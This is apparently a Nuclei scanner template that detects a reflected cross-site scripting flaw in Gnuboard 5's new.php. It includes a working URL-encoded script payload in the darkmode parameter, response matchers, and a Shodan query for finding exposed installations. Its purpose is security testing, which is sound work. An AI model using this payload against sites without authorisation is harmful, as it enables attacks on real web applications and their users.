id: gnuboard5-xss

info:
  name: Gnuboard 5 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Gnuboard 5 contains a cross-site scripting vulnerability via the clean_xss_tags() function called in new.php.
  reference:
    - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"gnuboard5"
  tags: xss,gnuboard,gnuboard5,huntr

http:
  - method: GET
    path:
      - "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'header\"><script>alert(document.domain)</script>.css?'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100d520e202a711b4ced4b2607cab2fae9c8321b686b11c1c7c097de0e30ca4bcd202202ba0be9c6f7c4b6229b24866bdc47291eff008fd952a46648680d5ee56e4ad43:922c64590222798bb761d5b6d8e72950
